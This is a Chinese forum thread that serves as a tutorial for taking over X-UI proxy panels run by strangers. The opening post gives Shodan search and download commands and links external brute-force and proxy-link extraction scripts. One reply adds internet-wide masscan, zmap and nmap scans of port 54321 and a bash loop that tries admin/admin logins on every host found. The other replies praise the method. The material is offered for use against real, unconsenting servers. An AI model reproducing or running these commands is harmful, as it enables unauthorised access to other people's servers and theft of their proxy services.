扫描XUI到提取代理链接 全教程

查看 86|回复 9
作者:silence   
   
1. 从shodan抓取XUI链接
先安装初始化shodan
shodan count http.html:登录 http.component:Vue.js http.component:Moment.js http.component:"Clipboard.js" http.title:"登录"
得到数量
x
shodan download http.html:登录 http.component:Vue.js http.component:Moment.js http.component:"Clipboard.js" http.title:"登录" --limit
x
shodan parse --fields ip_str,port --separator : http.html:登录.json.gz > url_all.txt
现在url_all.txt里面就是XUI链接了
2. 爆破XUI
脚本在这里,和url_all.txtx放在一个文件夹里运行,爆破完成后会输出到success.txt
https://pastebin.com/cB200v2v
3. 从XUI提取代理链接
同样是放在同一文件夹,自行配置好selenium和webdriver,需要在windows/macos下运行,linux桌面试过了剪贴板有问题
运行结束后会保存代理链接到xui.txt
后续可以将其制作成订阅,然后靠转换工具转成clash的订阅,可以自动优选节点,方便使用
https://pastebin.com/4TdzzhTx
到此教程结束,并鄙视靠这圈人头的行为

链接, 后会, 结束

898198   
安装
debian下都可以一键安装
apt install -y nmap zmap masscan
粗扫
先用这些软件进行端口粗扫,用哪个都行
masscan
masscan 0.0.0.0/0 -p54321 --banners --exclude 255.255.255.255 -oJ scan.json
zmap
zmap --target-port=54321 --output-file=scan.log
nmap
nmap -sS 0.0.0.0/0 -p 54321 | grep -v failed > scan.log
弱口令尝试
早年一些某ui的一键安装脚本采用admin/admin的弱密码,很多人都懒得改,因此可以针对开放默认端口54321的服务器逐一尝试登录
#!/bin/bash
for ip_ad in $(sed -nE  's/.*"ip": "([^"]+)".*/\1/p' scan.json); do
        if curl --max-time 1 http://$ip_ad:54321; then
                res=$(curl "http://${ip_ad}:54321/login"  --data-raw 'username=admin&password=admin' --compressed  --insecure)
                if [[ "$res" =~ .*true.* ]]; then
                        echo $ip_ad | tee >> week.log
                fi
                echo $ip_ad | tee >> all.log
        fi
done;
week.log里面就是所有扫出来的可以弱口令登录的机器,挺容易扫出来的
all.log是改了密码的机器,有兴趣可以尝试进一步字典枚举
惜为伊人醉   
技术贴,厉害了。帮顶一下 。
imgood   
字典爆破?
菊花帅比   
默认密码的总共就那些,再扫也扫不出来了
silence
OP
  

imgood 发表于 2023-2-15 15:40
字典爆破?

默认密码admin/admin扫一下就够了,没必要专门去爆破
vlin   
技术贴,帮顶一下 。
sagerking   
v2fly或者xray就一个config文件,搞不懂为什么要UI。。
silence
OP
  

菊花帅比 发表于 2023-2-15 15:40
默认密码的总共就那些,再扫也扫不出来了

我去年扫到现在了,越来越多。。。
898198   
https://www.nodeseek.com/post-1084-1
教程我之前出过的,没藏着掖着
不知道shodan收录的完整性如何,我是直接把全球ipv4的54321端口扫了一遍
您需要登录后才可以回帖 登录 | 立即注册

返回顶部